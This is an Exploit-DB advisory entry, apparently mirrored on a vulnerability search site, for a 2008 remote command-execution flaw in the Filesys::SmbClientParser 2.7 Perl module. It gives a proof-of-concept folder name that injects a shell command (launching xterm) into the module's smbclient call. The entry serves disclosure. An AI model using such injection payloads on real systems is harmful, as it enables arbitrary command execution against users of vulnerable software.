Lucene search

K
exploitdbJesus Olmos GonzalezEDB-ID:32084
HistoryJul 18, 2008 - 12:00 a.m.

SmbClientParser 2.7 Perl Module - Remote Command Execution

2008-07-1800:00:00
Jesus Olmos Gonzalez
www.exploit-db.com
18

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/30290/info

The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data.

Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module.

Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected.

Name a folder the following:
' x && xterm &#

A shared folder containing this named folder will execute the following command:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc" 

AI Score

7.4

Confidence

Low

Related for EDB-ID:32084